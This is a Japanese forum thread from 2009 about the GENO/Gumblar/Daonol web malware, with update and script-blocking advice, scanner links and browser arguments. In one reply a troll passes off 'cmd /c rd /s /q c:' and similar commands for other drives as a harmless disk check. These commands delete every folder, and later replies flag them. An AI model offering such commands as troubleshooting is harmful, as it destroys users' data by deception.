XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新(使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
Adobe Readerを開いて ヘルプ→アップデートの有無をチェック
■ Adobe Flash Playerを更新(動画サイト見てるなら絶対入ってる。IE版、非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
以上でGumblar.x / Daonolは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
・Firefox NoScriptを導入する。
・Google Chrome -disable-javascriptで起動。
・Opera ツール→設定→詳細設定タブ→「JavaScriptを有効にする」のチェックを外す。
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
優先度低
■ Vistaの人ははUACをONにする
■ Adobe Shockwave Player (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Version 6 Update (Javascriptとは違うので注意)
ttp://www.java.com/ja/
前スレ
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
■ 感染の確認方法
10月からの亜種はウイルスがレジストリの痕跡を隠蔽するため
11月現在簡単な確認方法がありません
今回対応がよさそうなKasperskyでスキャンしてください
@niftyウイルスチェックサービス(Kasperskyエンジンのオンラインスキャン)
ttp://www.nifty.com/security/vcheck/index.htm
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
■ 旧型GENOウイルスのまとめなど
*** 【注意!】10月からの亜種には無効な情報があります ***
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
【関連スレ】
GENOウイルススレ 感染4台目 - インターネット板
http://pc11.2ch.net/test/read.cgi/internet/1243050166/
【報告専用】同人サイト向け・GENOウィルス注意11 - 同人板
http://changi.2ch.net/test/read.cgi/doujin/1244096936/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/
GENOウイルススレ ★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ ★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ ★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415022/
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
GENOウイルススレ ★7
http://pc11.2ch.net/test/read.cgi/sec/1242465121/
GENOウイルススレ ★8
http://pc11.2ch.net/test/read.cgi/sec/1242476260/
GENOウイルススレ ★9
http://pc11.2ch.net/test/read.cgi/sec/1242489450/
GENOウイルススレ ★10
http://pc11.2ch.net/test/read.cgi/sec/1242504332/
GENOウイルススレ ★11
http://pc11.2ch.net/test/read.cgi/sec/1242538005/
GENOウイルススレ ★12
http://pc11.2ch.net/test/read.cgi/sec/1242557561/
GENOウイルススレ ★13
http://pc11.2ch.net/test/read.cgi/sec/1242576033/
GENOウイルススレ ★14
http://pc11.2ch.net/test/read.cgi/sec/1242611652/
GENOウイルススレ ★15
http://pc11.2ch.net/test/read.cgi/sec/1242627614/
GENOウイルススレ ★16
http://pc11.2ch.net/test/read.cgi/sec/1242636332/
GENOウイルススレ ★17
http://pc11.2ch.net/test/read.cgi/sec/1242650756/
GENOウイルススレ ★18
http://pc11.2ch.net/test/read.cgi/sec/1242666396/
GENOウイルススレ(Gumblar,Martuz,JSRedir-R) ★19
http://pc11.2ch.net/test/read.cgi/sec/1242755190/
GENOウイルススレ ★20
http://pc11.2ch.net/test/read.cgi/sec/1243016705/
GENOウイルススレ ★21
http://pc11.2ch.net/test/read.cgi/sec/1243346768/
GENOウイルススレ ★22
http://pc11.2ch.net/test/read.cgi/sec/1245640557/
http://www.forest.impress.co.jp/docs/review/20091020_323014.html
http://hide9999.web.fc2.com/
MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
しかしだな、前スレ(22)以前の物はいらないと思う。
http://headlines.yahoo.co.jp/hl?a=20091130-00000006-zdn_ep-sci
これってエロゲーにsetup.exeを仕込まれてた例のアレ?
晒し会場(現在は404)
ttp://p3p.jp/top
winnyでファイルをDLしたんですが、そこでシリアルが必要といわれ...
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1233404027
ダウソ板でやれ
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701
http://pc11.2ch.net/test/read.cgi/sec/1259820451/
これもGENO系なの?
http://www.virustotal.com/jp/isis/eb8d63a5a4a2f97c1129caf0fe84ce651cc8d029cbfcad75ebdc5017793c6715-1259829527
対応済み:AntiVir・AVG・F-Secure・K7AntiVirus・McAfee・Panda・Symantec 他
未対応:Avast・BitDefender・GData・Kaspersky・Microsoft・NOD32・TrendMicro 他
これGumblar.x 系らしいよ。
> Symantec 1.4.4.12 2009.12.03 Infostealer.Kenzero
Illegal Games? Pay the Price?Publicly!
ttp://www.symantec.com/connect/blogs/illegal-games-pay-price-publicly
Infostealer.Kenzero primarily arrives in the guise of setup.exe,
which in this case is a fake installation file for Japanese pornographic games
that are circulating around the file-sharing network “Share.”
Several pornographic games have been reported to include this malicious setup.exe file.
/ \
/ _ノ ヽ、_ \
/ o゚((●)) ((●))゚o \ ほんとはShareでエロゲを違法ダウンロードしたんだお…
| (__人__)' |
\ `⌒´ /
____
/ \
/ _ノ ヽ、_ \
/ o゚⌒ ⌒゚o \ でも恥ずかしくて言えないお…
| (__人__) |
\ ` ⌒´ /
____
/⌒ ⌒\
/( ●) (●)\
/::::::⌒(__人__)⌒::::: \ だからGENOのせいにするお!
| |r┬-| |
\ `ー'´ /
以前も感染するわけ無いのに報告あったから
感染したと言ってる人は本当かどうかは別として知識がない
だから報告も信憑性がない
http://tsushima.2ch.net/test/read.cgi/news/1259935979/
それでも感染したとか言う人がいた
先月4位から1位に浮上したのは、感染コンピュータのユーザ情報や
FTPサーバへのログイン名とパスワードを盗み出そうとする「TSPY_KATES(カテス)」です。
「TSPY_KATES」は、「JS_GUMBLER(ガンブラー)」や「JS_IFRAME(アイフレーム)」によって
改ざんされた正規のWebサイトから、リダイレクトされる不正なWebサイトより感染することが確認されています。
ttp://www.viruslist.com/en/weblog?weblogid=208187923
ttp://www.viruslist.com/en/images/pictures/vlweblog/208187928.jpg
感染 日本7位
リダイレクタ 日本6位
http://pc11.2ch.net/test/read.cgi/sec/1259237196/
ttp://www3.atword.jp/gnome/2009/12/06/dec-06-2009-sun/
gnomeさん・・・時計が1ヶ月ずr(ry
もちろんセーフモードでも起動できない
でも5回くらいやってるとまた何事もなかったかのように起動する
ウイルス感染?それともハード関連の不具合かな?
OS他PCスペック等が判らないからなんとも言えないが、
簡易検出の「チェックディスクコマンド」を試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
>30を実行するとフォルダが全部削除されるから気をつけろ
とりあえず通報しといた
アドバイスありがとう。
だが大丈夫だ。今時のゆとりは(俺含め)、
こんなコマンドなんざ面倒くさがっていちいち打ったりしない。
--
962 :名無しさん@お腹いっぱい。:2009/12/03(木) 14:49:43
Trojan-Downloader.JS.Gumblar.x 確認
www●jwell●com
963 :名無しさん@お腹いっぱい。:2009/12/03(木) 15:24:10
jsに突っ込まれてるね。
/js/font.js
/js/base.js
/inc/prog.js
とか言われるとスゲー不安
全部最新版にしておけばいい
スクリプト防いだ!スゴイ!よりは効果があるわ
MACウイルス無いとか威張ってるのと同じだな
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
他人に強制するほどの根拠があるかね
Windows使うの辞めろよ
使い勝手はIEコンポブラウザならかわらんし
リナックスでも使ってろ糞狐
押し付けがましいんだよ
Firefox厨
※よくわからない人は「Firefox+NoScript」を導入しましょう。
よく分からない奴がそんなモン使うわけねえだろきめえ
一人で何回も書き込んじゃってw
IEでスクリプト全オフでブラウジングしたほうがまし
スレ伸ばすにはにはNoScriptがいいとか書いてテンプレwいじれば
ブラウザ戦争が勃発
他のやる気なさすげえ
ttp://internet.watch.impress.co.jp/docs/news/20091209_334535.html
いつも、普通にコントロールパネルから通常アンインストール→最新版をインストールでやってる
IEはエンジン部分だけ2chブラウザで利用しているが完全放置
flashも入れていない
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
(各ブラウザで確認すること)
インスコ時のバージョン○○がインスコされましたってのは
Adobeの中の人の手打ちなので信用すんな
>>5
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
それが嫌ならMacつかいましょうもテンプレに入れろカス
IE(笑)は、スクリプト以前にActiveXが
IEでもスクリプトオフに出来るしIEで修正されてない脆弱性を突くとか言う情報も無し
せいぜいシェアが低いから狙われにくいとかいうのぐらいだろ
どんだけー
鉄砲が危険だから死んだと遺族が訴えた
リナックスでも使ってろ
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の用途に使わないで下さい。
はなおせよ
まったくその通りです。
むしろよくわからない人は「NoScript」を導入しないで下さいだと思う。
ここはブラウザの優劣を競うすれじゃないんだし、並列に扱えばいいじゃない。
■ブラウザでスクリプト使用を基本無効に設定
ここに>>84さんの言うIEの設定方法を書き加えて
これを削除する
↓↓↓
・IE(インターネット・エクスプローラー) Windows Update (Microsoft Update)以外の
用途に使わないで下さい。
※よくわからない人は「Firefox+NoScript」を導入しましょう。
このくだりは全部いらねえよ
更新だけしとけばいい
「レベルのカスタマイズ」ボタン -> 「スクリプト」 の「アクティブスクリプト」で「無効にする」を選択。
でjavascript無効
セキュリティのインターネットのゾーンを基本全部無効にして
信頼済みサイトに追加していけばいいだろう
noscriptとか使うのと同じ感じになる
IEコンポ系ではワンタッチで有効無効を切り替えられるのもある
まあスクリプト使用!危険
そんなヒステリーにつきあってられるかってのが実際だ
荒らしに構うな
これが大変なんだけどね…
NoScriptなら簡単に追加できる!!馬鹿かと
ここまでNoScriptをスルーできない人でお送りしました。
スルー
TOP カテ一覧 スレ一覧 削除依頼 ▲
・ 次のスレ
Immunet Protect - Free!
企業向けウイルス対策製品を語る その2
Jetico Personal Firewall Part14
【永久無料】サイバー・ツリーver.3.0【超最強】